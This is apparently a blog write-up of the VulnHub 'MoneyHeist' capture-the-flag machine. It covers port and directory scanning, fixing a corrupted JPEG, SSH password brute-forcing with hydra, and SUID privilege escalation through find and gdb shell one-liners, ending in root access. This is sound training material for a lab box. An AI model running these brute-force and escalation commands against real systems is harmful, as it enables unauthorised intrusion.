VulnHub: MoneyHeist: Catch Us If You Can

Al1z4deh:~# echo "Welcome"
5 min readApr 29, 2022

--

Today we will take a look at Vulnhub: Catch Us İf You Can. My goal in sharing this writeup is to show you the way if you are in trouble. Please try to understand each step and take notes.

  • Network scan

Command: sudo nmap -p- -sV -sC -oN nmap/open 192.168.0.110 — open

  • Gobuster scan

Command: gobuster dir -u http://192.168.0.110/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

When we look at the robots extension, we see the image tokyo.jpeg. but he was injured. Let’s download and fix.

Command: wget http://192.168.0.110/robots/tokyo.jpeg

You can find true titles here

List of file signatures - Wikipedia

needs additional citations for verification .improve this article by (Learn how and when to remove this template…

en.wikipedia.org

Command: hexeditor tokyo.jpeg

Let’s look at the corrected image.

This is a trap.

Let’s look at the gate extension

we see the gate.exe file. let’s download and see

Here’s a new extension.

When we look at the page, we see a simple page. let’s check the bride extension

Command: gobuster dir -u http://192.168.0.110/BankOfSp41n -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.txt

When you go to login.php, it is a simple login page. Let’s check a few simple default credentials

Let’s look at the source code

And here we find the username and the password, let’s enter.

When I looked at the page, I couldn’t find anything to use

I looked at the source code at the end and saw a username here

Let’s try to log in with ssh with this name. But first let’s find the password

  • Hydra

Command: hydra -l arturo -P /usr/share/wordlists/rockyou.txt ssh://192.168.0.110:55001 -I -t 4

  • Ssh

Command: find / -type f -perm -04000 -ls 2>/dev/null

Let’s change the user. We will use it for this

GTFOBins

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured…

gtfobins.github.io

Command: find . -exec /bin/sh -p \; -quit

yes we are now denver.

Let’s look at the secret_diary of the Denver folder and get a new extension. let’s check it

Let’s use it to decode

Modular conversion, encoding and encryption online

Web app offering modular conversion, encoding and encryption online. Translations are done in the browser without any…

cryptii.com

Find the encrypted text by making different decodings

Nairobi

Command: su nairobi

Tokyo

Command: find / -type f -perm -04000 -ls 2>/dev/null

Command: gdb -nx -ex ‘python import os; os.execl(“/bin/sh”, “sh”, “-p”)’ -ex quit

I looked in Tokyo’s folder and saw an text like this.

If we combine the capital letters of the words, we get the root password.

And now we are the root

“If you have any questions or comments, please do not hesitate to write. Have a good days”

Elman Alizadeh - Azerbaijan Architecture and Construction University - Baku, Baku, Azerbaijan |…

View Elman Alizadeh's profile on LinkedIn, the world's largest professional community. Elman has 2 jobs listed on their…

www.linkedin.com

Vulnhub
Money Heist
Catch Us If You Can

--

--

Al1z4deh:~# echo "Welcome"

Written by Al1z4deh:~# echo "Welcome"

322 Followers

Al1z4deh:~# echo "eJPT, CEH, OSCP"

Help

Status

Writers

Blog

Careers

Privacy

Terms

About

Text to speech

Teams